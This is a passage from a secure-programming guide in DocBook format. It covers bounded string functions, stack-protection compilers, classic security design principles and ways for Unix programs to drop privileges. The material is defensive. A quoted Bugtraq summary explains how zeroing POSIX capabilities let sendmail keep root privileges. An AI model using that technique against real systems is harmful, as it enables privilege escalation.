An alternative, being employed by OpenBSD, is the
strlcpy(3) and strlcat(3) functions by Miller and de Raadt [Miller 1999].
This is a minimalist, statically-sized buffer approach that provides C string
copying and concatenation with a different (and less error-prone) interface.
Source and documentation of these functions
are available under a newer BSD-style open source license at
<ulink
url="ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3">ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3</ulink>.
</para>

<para>
First, here are their prototypes:

<screen width="61">
size_t strlcpy (char *dst, const char *src, size_t size);
size_t strlcat (char *dst, const char *src, size_t size);
</screen>

Both strlcpy and strlcat
take the full size of the destination buffer as a parameter
(not the maximum number of characters to be copied) and guarantee to
NIL-terminate the result (as long as size is larger than 0).
Remember that you should include a byte for NIL in the size.
</para>

<para>
The strlcpy function copies up to
size-1 characters from the NUL-terminated string src to dst,
NIL-terminating the result.
The strlcat
function appends the NIL-terminated string
src to the end of dst.
It will append at most
size - strlen(dst) - 1 bytes, NIL-terminating the result.
</para>

<para>
One minor disadvantage of strlcpy(3) and strlcat(3) is that they are
not, by default, installed in most Unix-like systems.
In OpenBSD, they are part of &lt;string.h&gt;.
This is not that difficult a problem; since they are small functions, you can
even include them in your own program's source (at least as an option),
and create a small separate package to load them.
You can even use autoconf to handle this case automatically.
If more programs use these functions, it won't be long before these are
standard parts of Linux distributions and other Unix-like systems.
Also, these functions have
been recently added to the ``glib'' library (I submitted the patch
to do this), so using recent versions of glib makes them available.
In glib these functions are named g_strlcpy and g_strlcat
(not strlcpy or strlcat) to be consistent with the glib library
naming conventions.
</para>

<para>
Also, strlcat(3) has slightly varying semantics
when the provided size is 0 or if there are no NIL characters in
the destination string dst (inside the given number of characters).
In OpenBSD, if the size is 0, then the destination string's length is
considered 0.
Also, if size is nonzero, but there are no NIL characters
in the destination string (in the size number of characters), then
the length of the destination is considered equal to the size.
These rules make handling strings without embedded NILs consistent.
Unfortunately, at least Solaris doesn't (at this time) obey these rules,
because they weren't specified in the original documentation.
I've talked to Todd Miller, and he and I agree that the OpenBSD
semantics are the correct ones (and that Solaris is incorrect).
The reasoning is simple: under no condition should strlcat or strlcpy
ever examine characters in the destination outside of the range of size;
such access might cause core dumps (from accessing out-of-range memory)
and even hardware interactions (through memory-mapped I/O).
Thus, given:
<screen width="61">
  a = strlcat ("Y", "123", 0);
</screen>
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4
because it incorrectly looks at characters beyond the "size" length in
the destination.
For now, I suggest avoiding cases where the size is 0 or the destination
has no NIL characters.
Future versions of glib will hide this difference and always use the OpenBSD
semantics.
</para>

</sect2>

<sect2 id="libmib">
<title>libmib</title>

<para>
One toolset for C that dynamically reallocates strings automatically
is the ``libmib allocated string functions'' by
Forrest J. Cavalier III, available at
<ulink
url="http://www.mibsoftware.com/libmib/astring">http://www.mibsoftware.com/libmib/astring</ulink>.
There are two variations of libmib; ``libmib-open'' appears to be clearly
open source under its own X11-like license that
permits modification and redistribution, but redistributions must choose
a different name, however, the developer states that it
``may not be fully tested.''
To continuously get libmib-mature, you must pay for a subscription.
The documentation is not open source, but it is freely available.
</para>

</sect2>

<sect2 id="std-string">
<title>C++ std::string class</title>

<para>
C++ developers can use the std::string class, which is built into the
language.
This is a dynamic approach, as the storage grows as necessary.
However, it's important to note that if that class's data is turned
into a ``char *'' (e.g., by using data() or c_str()),
the possibilities of buffer overflow resurface, so you need to be careful
when using such methods.
Note that c_str() always returns a NIL-terminated string, but
data() may or may not (it's implementation dependent, and most
implementations do not include the NIL terminator).
Avoid using data(), and if you must use it, don't be dependent on its format.
</para>

<para>
Many C++ developers use other string libraries as well, such as
those that come with other large libraries or even home-grown string libraries.
With those libraries, be especially careful - many
alternative C++ string classes
include routines to automatically convert the class to a ``char *'' type.
As a result, they can silently introduce buffer overflow vulnerabilities.
</para>

</sect2>

<sect2 id="libsafe">
<title>Libsafe</title>

<para>
Arash Baratloo, Timothy Tsai, and Navjot Singh
(of Lucent Technologies)
have developed Libsafe, a wrapper of several library functions known to be
vulnerable to stack smashing attacks.
This wrapper (which they call a kind of ``middleware'')
is a simple dynamically loaded library that contains modified versions
of C library functions such as strcpy(3).
These modified versions
implement the original functionality, but in a manner that ensures
that any buffer overflows are contained within the current stack frame.
Their initial performance analysis suggests that this
library's overhead is very small.
Libsafe papers and source code are available at
<ulink url="http://www.research.avayalabs.com/project/libsafe">
http://www.research.avayalabs.com/project/libsafe</ulink>.
<!-- <ulink url="http://www.bell-labs.com/org/11356/libsafe.html">http://www.bell-labs.com/org/11356/libsafe.html</ulink>.
-->
The Libsafe source code is available under the completely
open source LGPL license.
</para>

<para>
Libsafe's approach appears somewhat useful.
Libsafe should certainly be considered for inclusion by Linux
distributors, and its approach is worth considering by others as well.
For example, I know that the Mandrake distribution of Linux (version
7.1) includes it.
<!-- http://www.sopac.org/linux/RPM/mandrake/7.1/Mandrake/RPMS2/Linux-Mandrake.html -->
However, as a software developer, Libsafe is a useful mechanism
to support defense-in-depth but it does not really prevent buffer
overflows.
Here are several reasons why you shouldn't depend just on Libsafe
during code development:
<itemizedlist>

<listitem><para>
Libsafe only protects a small set of known functions with obvious
buffer overflow issues.
At the time of this writing, this list is significantly shorter than
the list of functions in this book known to have this problem.
It also won't protect against code you write yourself (e.g., in
a while loop) that causes buffer overflows.
</para></listitem>

<listitem><para>
Even if libsafe is installed in a distribution, the way it is installed
impacts its use.
The documentation recommends setting LD_PRELOAD
to cause libsafe's protections to be enabled, but the problem
is that users can unset this environment variable... causing the
protection to be disabled for programs they execute!
</para></listitem>

<listitem><para>
Libsafe only protects against buffer overflows of the stack onto the
return address;
you can still overrun the heap or other variables in that procedure's frame.
</para></listitem>

<listitem><para>
Unless you can be assured that all deployed platforms will use libsafe
(or something like it), you'll have to protect your program as though
it wasn't there.
</para></listitem>


<listitem><para>
LibSafe seems to assume that saved frame pointers are at the beginning of
each stack frame.  This isn't always true.
Compilers (such as gcc) can optimize away things, and in particular the
option "-fomit-frame-pointer" removes the information that libsafe
seems to need.
Thus, libsafe may fail to work for some programs.
<!-- More info at:
  http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/109/1.html
  http://www2.merton.ox.ac.uk/~security/security-audit-200004/0069.html -->
</para></listitem>
</itemizedlist>
</para>

<para>
The libsafe developers themselves acknowledge that software developers
shouldn't just depend on libsafe.
In their words:

<blockquote><para>
It is generally accepted that the best solution to
buffer overflow attacks is to fix the defective programs.
However, fixing defective programs requires knowing that
a particular program is defective.
The true benefit of using libsafe and other alternative
security measures is protection against future attacks
on programs that are not yet known to be vulnerable.
</para></blockquote>
</para>
</sect2>

<sect2 id="other-buffer-libraries">
<title>Other Libraries</title>

<para>
The glib (not glibc) library is a widely-available
open source library that provides
a number of useful functions for C programmers.
GTK+ and GNOME both use glib, for example.
As I noted earlier, in glib version 1.3.2, g_strlcpy() and g_strlcat() have
been added through a patch which I submitted. This should make it easier to
portably use those functions once these later versions of glib
become widely available.
At this time I do not have an analysis showing definitively that the
glib library functions protect against buffer overflows.
However, many of the glib functions automatically allocate memory,
and those functions automatically
<emphasis>fail with no reasonable way to intercept the failure</emphasis>
(e.g., to try something else instead).
As a result, in many cases most glib functions cannot
be used in most secure programs.
The GNOME guidelines recommend using functions such as
g_strdup_printf(), which is fine as long as it's okay if your program
immediately crashes if an out-of-memory condition occurs.
However, if you can't accept this, then using such routines isn't appropriate.
</para>

<!--
??? Need to investigate if standard demands safety.
C++ has a set of string classes and templates as well
(see basic&lowbar;string and string)
-->

</sect2>

</sect1>

<sect1 id="compilation-c">
<title>Compilation Solutions in C/C++</title>

<para>
A completely different approach is to use compilation methods that perform
bounds-checking (see [Sitaker 1999] for a list).
In my opinion, such tools are very useful in having multiple layers of
defense, but it's not wise to use this technique as your sole defense.
There are at least two reasons for this.
First of all, such tools generally only provide a partial defense against
buffer overflows (and the ``complete'' defenses are generally
12-30 times slower); C and C++ were simply not designed to protect
against buffer overflows.
<!--
See Bugtraq, 23 Apr 2002,
Iv<EFBFBD>n Arce <core.lists.bugtraq@core-sdi.com>,
which discusses how to circumvent them.
-->
Second of all, for open source programs you cannot be certain what tools
will be used to compile the program; using the default ``normal'' compiler
for a given system might suddenly open security flaws.
</para>

<para>
One of the more useful tools is ``StackGuard'', a modification of the
standard GNU C compiler gcc.
StackGuard works by inserting a ``guard'' value (called a ``canary'')
in front of the return address; if a buffer overflow
overwrites the return address, the canary's value (hopefully) changes
and the system detects this before using it.
This is quite valuable, but note that this does not protect against
buffer overflows overwriting other values (which they may still be able
to use to attack a system).
There is work to extend StackGuard to be able to add canaries to other
data items, called ``PointGuard''.
PointGuard will automatically protect certain values (e.g., function
pointers and longjump buffers).
However, protecting other variable types using PointGuard
requires specific programmer intervention (the programmer
has to identify which data values must be protected with canaries).
This can be valuable, but it's easy to accidentally omit
protection for a data value you didn't think needed protection -
but needs it anyway.
More information on StackGuard, PointGuard, and other alternatives
is in Cowan [1999].
</para>

<para>
<ulink url="http://www.trl.ibm.com/projects/security/ssp">
IBM has developed a stack protection system called ProPolice
based on the ideas of StackGuard</ulink>.
IBM doesn't include the ProPolice in its current website - it's just called
a "GCC extension for protecting applications from stack-smashing attacks."
Like StackGuard, ProPolice
is a GCC (Gnu Compiler Collection) extension for
protecting applications from stack-smashing attacks.
Applications written in C are protected by automatically inserting
protection code into an application at compilation time.
ProPolice is slightly different than StackGuard, however, by adding
three features:
(1) reordering local variables to place buffers after pointers
(to avoid the corruption of pointers that could be used
to further corrupt arbitrary memory locations),
(2) copying pointers in function arguments to an area
preceding local variable buffers (to prevent the corruption of pointers
that could be used to further corrupt arbitrary memory locations), and
(3) omitting instrumentation code from some functions
(it basically assumes that only character arrays are dangerous; while
this isn't strictly true, it's mostly true, and as a result ProPolice
has better performance while retaining most of its protective capabilities).
The IBM website includes information for how to build Red Hat Linux and
FreeBSD with this protection;
<ulink url="http://www.deadly.org/article.php3?sid=20021202175508">OpenBSD
has already added ProPolice to their base system</ulink>.
I think this is extremely promising, and I hope to see this capability included
in future versions of gcc and used in various distributions.
In fact, I think this kind of capability should be the default -
this would mean that the largest single class of attacks would no longer
enable attackers to take control in most cases.
</para>

<para>
As a related issue, in Linux you could modify the Linux kernel so that
the stack segment is not executable; such a patch to Linux does exist
(see Solar Designer's patch, which includes this, at
<ulink
url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>
However, as of this writing this is not built into the Linux kernel.
Part of the rationale is that this is less protection than it seems;
attackers can simply force the system to call other ``interesting'' locations
already in the program (e.g., in its library, the heap,
or static data segments).
Also, sometimes Linux does require executable code in the stack,
e.g., to implement signals and to implement GCC ``trampolines''.
Solar Designer's patch does handle these cases, but this does
complicate the patch.
Personally, I'd like to see this merged into the main Linux
distribution, since it does make attacks somewhat more difficult and
it defends against a range of existing attacks.
However, I agree with Linus Torvalds and others
that this does not add the amount of protection it would appear to and
can be circumvented with relative ease.
You can read Linus Torvalds' explanation for not including this support at
<!-- was: http://lwn.net/980806/a/linus-noexec.html -->
<ulink url="http://old.lwn.net/1998/0806/a/linus-noexec.html">
http://old.lwn.net/1998/0806/a/linus-noexec.html</ulink>.

</para>

<para>
In short, it's better to work first on developing a correct program
that defends itself against buffer overflows.
Then, after you've done this, by all means use techniques and tools
like StackGuard as an additional safety net.
If you've worked hard to eliminate buffer overflows in the code itself,
then StackGuard (and tools like it) are
are likely to be more effective because there will be
fewer ``chinks in the armor'' that StackGuard will be called on to protect.
</para>

</sect1>

<sect1 id="other-languages">
<title>Other Languages</title>

<para>
The problem of buffer overflows is an excellent argument for using
other programming languages
such as Perl, Python, Java, and Ada95.
After all, nearly all other programming languages used today
(other than assembly language) protect against buffer overflows.
Using those other languages does not eliminate all problems, of course;
in particular see the discussion in <xref linkend="handle-metacharacters">
regarding the NIL character.
There is also the problem of ensuring that those other languages'
infrastructure (e.g., run-time library) is available and secured.
Still, you should certainly consider using other programming languages
when developing secure programs to protect against buffer overflows.
</para>

</sect1>

</chapter>

<chapter id="internals">
<title>Structure Program Internals and Approach</title>

<epigraph>
<attribution>Proverbs 25:28 (NIV)</attribution>
<para>
Like a city whose walls are broken down is a man who lacks self-control.
</para>
</epigraph>

<sect1 id="follow-good-principles">
<title>Follow Good Software Engineering Principles for Secure Programs</title>

<para>
Saltzer [1974] and later Saltzer and Schroeder [1975]
list the following principles of the design of secure
protection systems, which are still valid:

<itemizedlist>
<listitem>

<para>
<emphasis remap="it">Least privilege</emphasis>.
Each user and program should operate using the fewest privileges possible.
This principle limits the damage from an accident, error, or attack.
It also reduces the number of potential interactions among privileged programs,
so unintentional,
unwanted, or improper uses of privilege are less likely to occur.
This idea can be extended to the internals of a program: only the smallest
portion of the program which needs those privileges should have them.
See <xref linkend="minimize-privileges"> for more about how to do this.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Economy of mechanism/Simplicity</emphasis>.
The protection system's design should be simple and
small as possible.
In their words,
``techniques such as line-by-line inspection of software and physical
examination of hardware that implements protection mechanisms are necessary.
For such techniques to be successful, a small and simple design is essential.''
This is sometimes described as the ``KISS'' principle
(``keep it simple, stupid'').
</para>
</listitem>


<listitem>
<para>
<emphasis remap="it">Open design</emphasis>.
The protection mechanism must not depend on attacker ignorance.
Instead, the mechanism should be public, depending on the secrecy of
relatively few (and easily changeable) items like passwords or private keys.
An open design makes extensive public scrutiny possible, and it also
makes it possible for users to convince themselves that the system about
to be used is adequate.
Frankly, it isn't realistic to try to maintain secrecy for a system that
is widely distributed;
decompilers and subverted hardware can quickly expose any ``secrets''
in an implementation.
Bruce Schneier argues that smart engineers should ``demand
open source code for anything related to security'',
as well as ensuring that it receives widespread review and that
any identified problems are fixed [Schneier 1999].
</para>
</listitem>

<listitem>
<para>
<emphasis remap="it">Complete mediation</emphasis>.
Every access attempt must be checked; position the mechanism
so it cannot be subverted.
For example, in a client-server model, generally the server must do all
access checking because users can build or modify their own clients.
This is the point of all of
<xref linkend="input">, as well as
<xref linkend="secure-interface">.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Fail-safe defaults (e.g., permission-based approach)</emphasis>.
The default should be denial of service, and the
protection scheme should then identify conditions under which
access is permitted.
See <xref linkend="safe-configure"> and <xref linkend="fail-safe">
for more.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Separation of privilege</emphasis>.
Ideally, access to objects should depend on more than one condition, so
that defeating one protection system won't enable complete access.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Least common mechanism</emphasis>.
Minimize the amount and
use of shared mechanisms (e.g. use of the /tmp or /var/tmp directories).
Shared objects provide potentially dangerous channels for information
flow and unintended interactions.
See <xref linkend="avoid-race"> for more information.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Psychological acceptability / Easy to use</emphasis>.
The human interface must be designed for ease of use so users will routinely
and automatically use the protection mechanisms correctly.
Mistakes will be reduced if
the security mechanisms closely match the user's mental image of
his or her protection goals.
</para>
</listitem>

</itemizedlist>

</para>

<para>
A good overview of various design principles for security is available in
Peter Neumann's
<ulink url="http://www.csl.sri.com/users/neumann/chats.html#4">
Principled Assuredly Trustworthy Composable Architectures</ulink>.
<!--
???: Add:
http://www.csl.sri.com/neumann/chats2.pdf
http://www.csl.sri.com/neumann/chats2.ps
-->

</para>
</sect1>

<sect1 id="secure-interface">
<title>Secure the Interface</title>

<para>
Interfaces should be minimal (simple as possible), narrow
(provide only the functions needed), and non-bypassable.
Trust should be minimized.
Consider limiting the data that the user can see.
</para>
</sect1>

<sect1 id="data-vs-control">
<title>Separate Data and Control</title>
<para>
Any files you support should be designed to completely separate
(passive) data from programs that are executed.
Applications and data viewers may be used to
display files developed externally, so in general don't allow them
to accept programs (also known as ``scripts'' or ``macros'').
The most dangerous kind is an auto-executing macro that executes
when the application is loaded and/or when the data is initially
displayed; from a security point-of-view this is generally
a disaster waiting to happen.
</para>

<para>
If you truly must support programs downloaded remotely
(e.g., to implement an existing standard), make sure that you
have extremely strong control over what the macro can do
(this is often called a ``sandbox'').
Past experience has shown that real sandboxes are hard to implement correctly.
In fact, I can't remember a single widely-used sandbox that hasn't been
repeatedly exploited (yes, that includes Java).
If possible, at least have the programs stored in a separate file, so that
it's easier to block them out when another sandbox flaw has been found
but not yet fixed.
Storing them separately also makes it easier to reuse code and to cache
it when helpful.
</para>
</sect1>

<sect1 id="minimize-privileges">
<title>Minimize Privileges</title>

<para>
As noted earlier, it is an important general
principle that programs have the minimal amount of privileges
necessary to do its job (this is termed ``least privilege'').
That way, if the program is broken, its damage is limited.
The most extreme example is to simply not write a secure program at all -
if this can be done, it usually should be.
For example, don't make your program setuid or setgid if you can; just
make it an ordinary program, and require the administrator to log in as such
before running it.
</para>

<para>
In Linux and Unix, the primary determiner of a process' privileges
is the set of id's associated with it:
each process has a real, effective and saved id for both the user and group
(a few very old Unixes don't have a ``saved'' id).
Linux also has, as a special extension, a separate filesystem UID and GID
for each process.
Manipulating these values is critical to keeping privileges minimized,
and there are several ways to minimize them (discussed below).
You can also use chroot(2) to minimize the files visible to a program,
though using chroot() can be difficult to use correctly.
There are a few other values determining privilege in Linux and Unix, for
example, POSIX capabilities (supported by Linux 2.2 and greater, and by
some other Unix-like systems).
</para>

<sect2 id="mimimize-privileges-granted">
<title>Minimize the Privileges Granted</title>

<para>
Perhaps the most effective technique is to simply minimize
the highest privilege granted.
In particular, avoid granting a program root privilege if possible.
Don't make a program <emphasis remap="it">setuid root</emphasis> if it only needs access
to a small set of files;
consider creating separate user or group accounts for different function.
</para>

<para>
A common technique is to
create a special group, change a file's group ownership to that group,
and then make the program <emphasis remap="it">setgid</emphasis> to that group.
It's better to make a program <emphasis remap="it">setgid</emphasis> instead of <emphasis remap="it">setuid</emphasis>
where you can,
since group membership grants fewer rights (in particular, it does not
grant the right to change file permissions).
</para>

<para>
This is commonly done for game high scores.
Games are usually setgid <emphasis remap="it">games</emphasis>,
the score files are owned by the group <emphasis remap="it">games</emphasis>,
and the programs themselves and their configuration files
are owned by someone else (say root).
Thus, breaking into a game allows the perpetrator to change high scores but
doesn't grant the privilege to change the game's executable or
configuration file.
The latter is important; if an attacker could change a game's executable
or its configuration files (which might control what the executable runs),
then they might be able to gain control of a user who ran the game.
</para>

<para>
If creating a new group isn't sufficient, consider creating a
new pseudouser (really, a special role) to manage a set of resources -
often a new pseudogroup (again, a special role) is also created just
to run a program.
Web servers typically do this; often web servers are set up with a special
user (``nobody'') so that they can be isolated from other users.
Indeed, web servers are instructive here: web servers typically need
root privileges to start up (so they can attach to port 80), but once
started they usually shed all their privileges and run as the user ``nobody''.
However, don't use the ``nobody'' account (unless you're writing a
webserver); instead, create your own pseudouser or new group.
The purpose of this approach is to isolate different programs,
processes, and data from each other,
by exploiting the operating system's ability to keep users and groups separate.
If different programs shared the same account, then breaking into one program
would also grant privileges to the other.
Usually the pseudouser should not own the programs it runs;
that way, an attack who breaks into the account cannot change
the program it runs.
By isolating different parts of the system into running separate users
and groups, breaking one part will not necessarily break the
whole system's security.
<!--
Martijn Vernooij noted http://httpd.apache.org/docs/mod/core.html#user :

 The user should have no privileges which result in it being able to
access files which are not intended to be visible to the outside world,
and similarly, the user should not be able to execute code which is not
meant for httpd requests. It is recommended that you set up a new user
and group specifically for running the server. Some admins use user nobody,
but this is not always possible or desirable.
-->
</para>

<para>
If you're using a database system (say, by calling its query interface),
limit the rights of the database user that the application uses.
For example, don't give that user access to all of the system stored procedures
if that user only needs access to a handful of user-defined ones.
Do everything you can inside stored procedures.
That way, even if someone does manage to force arbitrary strings into the
query, the damage that can be done is limited.
If you must directly pass a regular SQL query with client supplied data
(and you usually shouldn't), wrap it in something that limits its activities
(e.g., sp_sqlexec).
(My thanks to SPI Labs for these database system suggestions).
<!-- http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf -->
</para>

<para>
If you <emphasis remap="it">must</emphasis> give a program privileges
usually reserved for root,
consider using POSIX capabilities as soon as your program can
minimize the privileges available to your program.
POSIX capabilities are available in Linux 2.2 and in many other
Unix-like systems.
By calling cap&lowbar;set&lowbar;proc(3) or the Linux-specific capsetp(3)
routines immediately after starting, you can permanently
reduce the abilities of your program to just those abilities it actually needs.
For example the network time daemon (ntpd) traditionally has run as root,
because it needs to modify the current time.
However, patches have been developed so ntpd only needs a single
capability, CAP_SYS_TIME, so even if an attacker gains control over
ntpd it's somewhat more difficult to exploit the program.
</para>

<para>
I say ``somewhat limited'' because, unless other steps are taken,
retaining a privilege using POSIX capabilities
requires that the process continue to have the root user id.
Because many important files (configuration files, binaries, and so on)
are owned by root, an attacker controlling a program
with such limited capabilities can still modify
key system files and gain full root-level privilege.
A Linux kernel extension (available in versions 2.4.X and 2.2.19+)
<!-- It's available from 2.3.99-pre3 on, but now that 2.4's released the
     exact development version is only of academic interest.
     Chris Evans thought it might also be available in 2.2.18, but wasn't
     sure, so I thought I'd be safe and specify 2.2.19. -->
provides a better way to limit the available privileges:
a program can start as root (with all POSIX capabilities),
prune its capabilities down to just what it needs, call
prctl(PR_SET_KEEPCAPS,1), and then use setuid() to change to a
non-root process.
The PR_SET_KEEPCAPS setting marks a process so that when a process does
a setuid to a nonzero value, the capabilities aren't cleared
(normally they are cleared).
This process setting is cleared on exec().
However, note that PR_SET_KEEPCAPS is a Linux-unique extension for newer
versions of the linux kernel.
</para>

<para>
One tool you can use to simplify minimizing granted privileges
is the ``compartment'' tool developed by SuSE.
This tool, which only works on Linux,
sets the filesystem root, uid, gid, and/or the
capability set, then runs the given program.
This is particularly handy for running some other program without
modifying it.
Here's the syntax of version 0.5:

<screen width="61">

Syntax: compartment [options] /full/path/to/program

Options:
  --chroot path   chroot to path
  --user user     change UID to this user
  --group group   change GID to this group
  --init program  execute this program before doing anything
  --cap capset    set capset name. You can specify several
  --verbose       be verbose
  --quiet         do no logging (to syslog)
</screen>

</para>

<para>
Thus, you could start a more secure anonymous ftp server using:

<screen width="61">
  compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd
</screen>

</para>

<para>
At the time of this writing, the tool is immature and not available on
typical Linux distributions, but this may quickly change.
You can download the program via
<ulink
url="http://www.suse.de/~marc">http://www.suse.de/~marc</ulink>.
A similar tool is dreamland; you can that at
<ulink url="http://www.7ka.mipt.ru/~szh/dreamland">
http://www.7ka.mipt.ru/~szh/dreamland</ulink>.
</para>


<para>
Note that <emphasis remap="it">not</emphasis> all Unix-like systems,
implement POSIX capabilities, and PR_SET_KEEPCAPS is currently
a Linux-only extension.
Thus, these approaches limit portability.
However, if you use it merely as an optional safeguard only
where it's available, using this
approach will not really limit portability.
<!-- http://faqchest.dynhost.com/linux/KERNEL/kern-00/kern-0004/kern-000433/kern00041117_25233.html -->
<!-- http://www.linuxsecurity.com/feature_stories/kernel-24-security.html -->
Also, while the Linux kernel version 2.2 and greater includes the low-level
calls, the C-level libraries to make their use easy are not installed
on some Linux distributions, slightly complicating their use in applications.
For more information on Linux's implementation of POSIX capabilities, see
<ulink
url="http://linux.kernel.org/pub/linux/libs/security/linux-privs">http://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
</para>

<para>
FreeBSD has the jail() function for limiting privileges;
see the
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail
documentation</ulink>
for more information.
There are a number of specialized tools and extensions for limiting
privileges; see <xref linkend="unix-extensions">.

</para>

</sect2>

<sect2 id="minimize-time-privilege-usable">
<title>Minimize the Time the Privilege Can Be Used</title>

<para>
As soon as possible, permanently give up privileges.
Some Unix-like systems, including Linux,
implement ``saved'' IDs which store the ``previous'' value.
The simplest approach is to reset
any supplemental groups if appropriate (e.g., using setgroups(2)),
and then set the other id's twice to an untrusted id.
In setuid/setgid programs, you should usually set the effective gid and uid
to the real ones, in particular right after a fork(2),
unless there's a good reason not to.
Note that you have to change the gid first when dropping from root to another
privilege or it won't work - once you drop root privileges, you won't
be able to change much else.
Note that in some systems, just setting the group isn't enough, if the
process belongs to supplemental groups with privileges.
For example, the ``rsync'' program didn't remove the supplementary groups
when it changed its uid and gid, which created a potential exploit.
<!--
Here's Mandrake's alert, I should track down the CVE entry:
http://lwn.net/alerts/Mandrake/MDKSA-2002%3A024-1.php3
-->
</para>
<!--
To call other programs from setuid programs, use a structure like this
to reduce the privileges for the child:
fork()
if child:
 setgroups(...)     # to set supplementary groups
 setgid(getgid())
 setgid(getgid())   # do it twice to eliminate saved groups
 setuid(getuid())
 setuid(getuid())   # do it twice to eliminate saved uids.
 exec(...)

Note that this isn't approriate for servers working on behalf of another
user, since the current gid/uid is not usually the correct one.
-->

<para>
It's worth noting that there's a well-known related bug that
uses POSIX capabilities to interfere with this minimization.
This bug affects Linux kernel 2.2.0 through 2.2.15, and possibly a number
of other Unix-like systems with POSIX capabilities.
See Bugtraq id 1322 on http://www.securityfocus.com for more information.
Here is their summary:
<blockquote><para>
POSIX "Capabilities" have recently been implemented in the Linux kernel.
These "Capabilities" are an additional form of privilege control to enable
more specific control over what privileged processes can do. Capabilities are
implemented as three (fairly large) bitfields, which each bit representing a
specific action a privileged process can perform. By setting specific bits, the
actions of privileged processes can be controlled -- access can be granted for
various functions only to the specific parts of a program that require them.
It is a security measure. The problem is that capabilities are copied with
fork() execs, meaning that if capabilities are modified by a parent process,
they can be carried over. The way that this can be exploited is by setting all
of the capabilities to zero (meaning, all of the bits are off) in each of the
three bitfields and then executing a setuid program that attempts to drop
privileges before executing code that could be dangerous if run as root, such
as what sendmail does. When sendmail attempts to drop privileges using
setuid(getuid()), it fails not having the capabilities required to do so in its
bitfields and with no checks on its return value . It continues executing with
superuser privileges, and can run a users .forward file as root leading to a
complete compromise.
</para></blockquote>
One approach, used by sendmail, is to attempt to do
setuid(0) after a setuid(getuid()); normally this should fail.
If it succeeds, the program should stop.
For more information, see
http://sendmail.net/?feed=000607linuxbug.
In the short term this might be a good idea in
other programs, though clearly the better
long-term approach is to upgrade the underlying system.
</para>

</sect2>

<sect2 id="minimize-time-privilege-active">
<title>Minimize the Time the Privilege is Active</title>

<para>
Use setuid(2), seteuid(2), setgroups(2),
and related functions to ensure that the program
only has these privileges active when necessary,
and then temporarily deactivate the privilege when it's not in use.
As noted above, you might want to ensure that these privileges are disabled
while parsing user input, but more generally, only turn on privileges when
they're actually needed.
</para>

<para>
Note that some buffer overflow attacks, if successful, can force a program
to run arbitrary code, and that code could re-enable privileges that were
temporarily dropped.
Thus, there are <emphasis>many</emphasis>
attacks that temporarily deactivating a privilege won't counter -
it's always much better to completely drop privileges as soon as possible.
There are many papers that describe how to do this, such as
<ulink url="http://www.enderunix.org/docs/en/sc-en.txt">"Designing
Shellcode Demystified"</ulink>.
Some people even claim that ``seteuid() [is] considered harmful'' because
of the many attacks it doesn't counter.
Still, temporarily deactivating these permissions
prevents a whole class of attacks,
such as techniques to convince a program to write into a file that
perhaps it didn't intend to write into.
Since this technique prevents many attacks,
it's worth doing if permanently dropping the privilege can't be done
at that point in the program.
</para>

</sect2>

<sect2 id="minimize-privileged-modules">
<title>Minimize the Modules Granted the Privilege</title>

<para>
If only a few modules are granted the privilege, then it's much
easier to determine if they're secure.
One way to do so is to have a single module use the
privilege and then drop it, so that other modules called later cannot misuse
the privilege.
Another approach is to have separate commands in separate
executables; one command might be a complex
tool that can do a vast number of tasks for a privileged user (e.g., root),
while the other tool is setuid but is a small, simple tool that
only permits a small command subset (and does not trust its invoker).
The small, simple tool checks to see if the input meets various criteria for
acceptability, and then if it determines the input is acceptable, it
passes the data on to the complex tool.
Note that the small, simple tool must do a thorough job checking its inputs
and limiting what it will pass along to the complex tool, or this can
be a vulnerability.
The communication could be via shell invocation, or any IPC mechanism.
These approaches can even be layered several ways, for example,
a complex user tool could call a simple setuid
``wrapping'' program (that checks its inputs for secure values)
that then passes on information to another complex trusted tool.
</para>

<para>
This approach is the normal approach for developing GUI-based applications
which requre privilege, but must be run by unprivileged users.
The GUI portion is run as a normal unprivileged user process;
that process then passes security-relevant requests on to another process
that has the special privileges (and does not trust the first process, but
instead limits the requests to whatever the user is allowed to do).
Never develop a program that is
privileged (e.g., using setuid) and also directly invokes a graphical toolkit:
Graphical toolkits aren't designed to be used this way, and it would be
extremely difficult to audit graphical toolkits
in a way to make this possible.
Fundamentally, graphical toolkits must be large, and it's extremely
unwise to place so much faith in the perfection of that much code, so
there is no point in trying to make them do what should never be done.
Feel free to create a small setuid program that invokes two separate programs:
one without privileges (but with the graphical interface), and one with
privileges (and without an external interface).
Or, create a small setuid program that can be invoked by the unprivileged
GUI application.
But never combine the two into a single process.
For more about this, see the statement by
<ulink url="http://www.gtk.org/setuid.html">Owen Taylor about GTK
and setuid, discussing why GTK_MODULES is not a security hole</ulink>.
</para>

<para>
Some applications can be best developed by dividing the problem
into smaller, mutually untrusting programs.
A simple way is divide up the problem into separate programs that
do one thing (securely), using the filesystem and locking to
prevent problems between them.
If more complex interactions are needed, one approach is to
fork into multiple processes, each of which has different privilege.
Communications channels can be set up in a variety of ways; one
way is to have a "master" process create communication channels
(say unnamed pipes or unnamed sockets),
then fork into different processes and have each process
drop as many privileges as possible.
If you're doing this, be sure to watch for deadlocks.
Then use a simple protocol to allow the less trusted processes
to request actions from the more trusted process(es), and ensure that the more
trusted processes only support a limited set of requests.
Setting user and group permissions so that no one else can even start
up the sub-programs makes it harder to break into.
</para>

<para>
Some operating systems have the concept of multiple
layers of trust in a single process, e.g., Multics' rings.
Standard Unix and Linux don't have a way of separating multiple levels of trust
by function inside a single process
like this; a call to the kernel increases privileges,
but otherwise a given process has a single level of trust.
This is one area where technologies like Java 2, C# (which copies
Java's approach), and
Fluke (the basis of security-enhanced Linux) have an advantage.
For example,
Java 2 can specify fine-grained permissions such as the permission to
only open a specific file.
However, general-purpose operating systems do not typically
